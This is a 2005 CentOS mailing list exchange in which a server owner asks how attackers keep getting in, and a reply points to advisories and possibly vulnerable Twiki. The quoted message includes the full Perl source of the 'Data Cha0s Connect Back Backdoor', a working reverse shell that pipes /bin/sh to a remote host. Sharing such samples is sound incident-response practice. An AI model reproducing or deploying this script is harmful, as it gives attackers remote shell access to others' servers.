[CentOS] Apache/PHP Security Help.
Will McDonald
wmcdonald at gmail.com
Wed Nov 30 09:38:05 UTC 2005
A bit of simple Googling should point you in the right direction...
http://vil.nai.com/vil/content/v_129568.htm
http://www.google.co.uk/search?hl=en&q=Data+Cha0s+Connect+Back+Backdoor&btnG=Google+Search&meta=
Are you running Twiki open to the internet?
http://siomail.ucsd.edu/pipermail/rvtec-sysadmin/2004-December/000025.html
Will.
On 30/11/05, Ajay Sharma <ssharma at revsharecorp.com> wrote:
>
> I have a personal apache/mail server that is getting hacked and I'm not
> sure how the person is getting in. What's happening is that every few
> days, the below script will show up in /tmp as 'dc.txt', owned by apache
> and then a TON of mail is queued up to a bunch of addresses in
> @uol.com.br.
>
> I initially thought they got in becuase I had an outdated version of
> 'gallery' installed. I rebuild the server and update gallery and
> thought I should be okay. But now they are still getting in and instead
> of blindly rebuilding the server, I need to figure out how they are able
> to run perl scripts on the server.
>
> Any suggestions?
>
> --Ajay
>
> PS. This is a CentOS 4.2 box running the latest apache/php RPMS.
>
> ---------------------------
> #!/usr/bin/perl
> use Socket;
> print "Data Cha0s Connect Back Backdoor\n\n";
> if (!$ARGV[0]) {
> printf "Usage: $0 [Host] <Port>\n";
> exit(1);
> }
> print "[*] Dumping Arguments\n";
> $host = $ARGV[0];
> $port = 80;
> if ($ARGV[1]) {
> $port = $ARGV[1];
> }
> print "[*] Connecting...\n";
> $proto = getprotobyname('tcp') || die("Unknown Protocol\n");
> socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
> my $target = inet_aton($host);
> if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
> die("Unable to Connect\n");
> }
> print "[*] Spawning Shell\n";
> if (!fork( )) {
> open(STDIN,">&SERVER");
> open(STDOUT,">&SERVER");
> open(STDERR,">&SERVER");
> exec {'/bin/sh'} '-bash' . "\0" x 4;
> exit(0);
> }
> print "[*] Datached\n\n";
> --------------------------------
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> http://lists.centos.org/mailman/listinfo/centos
>
More information about the CentOS
mailing list